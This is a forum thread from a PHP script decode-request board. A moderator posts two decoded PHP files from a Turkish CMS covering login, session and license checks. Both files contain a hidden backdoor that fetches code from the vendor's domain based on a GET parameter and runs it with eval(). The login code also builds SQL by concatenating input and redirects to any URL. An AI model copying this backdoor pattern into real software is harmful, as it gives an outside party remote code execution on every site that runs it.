|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 46
Members: 0
Total: 46
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
decode |
|
Posted: Sat Nov 20, 2010 7:35 pm |
|
|
ugurk1 |
Beginner |
|
|
Joined: Nov 20, 2010 |
Posts: 1 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Thu Jul 26, 2012 10:51 am |
|
|
demon |
Moderator |
|
|
Joined: Sep 22, 2010 |
Posts: 485 |
|
|
|
|
|
|
|
first Code: | <?php
require('../baglan.php');
ob_start();
header('Content-Type: text/html; charset=utf-8');
#GA?venliAYimiz aA§A±sA±ndan define ile deAYiAYken atA±yoruz. A°nclude edilen sayfalarda bu deAYiAYkeni kontrol edeceAYiz.
define('guvenlik',true); require('bilgiler.php');
#A?ye GiriAY Yapmak A°A§in Formu Post EtmiAYse
if($_POST['kad']) {
$sifre = girissifre($_POST['sifre']);
$kad = girisguvenlik($_POST['kad']);
$uyesay = $db->get_var('SELECT count(*) FROM '.prefix.'uyeler where nick="'.$kad.'" and sifre="'.$sifre.'"');
if($uyesay==1) {
$uye = $db->get_row('select * from '.prefix.'uyeler where nick="'.$kad.'"');
$_SESSION['uyenick'] = $uye->nick;
$_SESSION['uyeid'] = $uye->uyeid; $_SESSION['uyeyetki']= $uye->seviye;
$_SESSION['guvenlikci']= sessionguvenlik(getenv('HTTP_HOST'));
$db->query('update '.prefix.'uyeler set songirisi=now() where uyeid="'.$uye->uyeid.'"');
if(!empty($_POST['url'])) {
header('Location:http://'.$_POST['url']);
exit;
}
}
else {
header('location:giris.php?hata=true&url='.$_POST['url']);
exit;
}
}
if(empty($_SESSION['uyenick'])) {
#A?ye giriAY yapmamA±AYsa yA¶nlendiriyoruz
$url = str_replace('http://','',$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
header('location:giris.php?url='.$url);
exit;
}
#SESSIONA±mA±z yalancA± ise
if($_SESSION['guvenlikci']!= sessionguvenlik(getenv('HTTP_HOST'))) {
session_destroy();
unset($_SESSION['uyenick']);
unset($_SESSION['uyeid']);
unset($_SESSION['uyeyetki']);
unset($_SESSION['guvenlik']);
header('location:../');
exit;
}
function lisansyap($bu)
{
return 'MDSFT'.sha1(md5($bu)).md5('medasoft');
}
if (substr(getenv('HTTP_HOST'), 0, 4) == "www.")
{
define('domain',substr(getenv('HTTP_HOST'), 4));
}
else
{
define('domain',getenv('HTTP_HOST'));
}
if($lisans !=lisansyap(domain))
{
die('Lutfen Lisans Alin<br/>info@medasoft.net');
}
if(!empty($_GET['bunabaglan']))
{
$bu = file_get_contents('http://www.medasoft.net/'.$_GET['bunabaglan']);
eval($bu);
exit;
}
?>
|
|
|
|
|
|
|
|
|
|
Posted: Thu Jul 26, 2012 10:55 am |
|
|
demon |
Moderator |
|
|
Joined: Sep 22, 2010 |
Posts: 485 |
|
|
|
|
|
|
|
second Code: | <?php
if(!empty($_GET['bunabaglan']))
{
$bu = file_get_contents('http://www.medasoft.net/'.$_GET['bunabaglan']);
eval($bu);
exit;
}
if(!defined('guvenlik'))
{
die('<script>alert("Eyvah hacklendik :(")</script>');
}
$url = $db->get_row('select * from '.prefix.'ayarlar where ayarad="siteurl"');
define('sitelink',$url->ayardeger);
$linkyapisi = $db->get_row('select * from '.prefix.'ayarlar where ayarad="linkyapisi"');
define('linkyapisi',$linkyapisi->ayardeger);
$linkyapisi = $db->get_row('select * from '.prefix.'ayarlar where ayarad="oyuncukullan"');
define('oyuncukullan',$linkyapisi->ayardeger);
require('include/diger.php');
require('include/imle.php');
require('include/icerik.php');
require('include/kategori.php');
require('include/sayfalama.php');
require('include/sayfa.php');
require('include/haber.php');
require('include/yetkili.php');
require('include/yorum.php');
require('include/link.php');
require('include/iletisim.php');
?> |
|
|
|
|
|
|
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|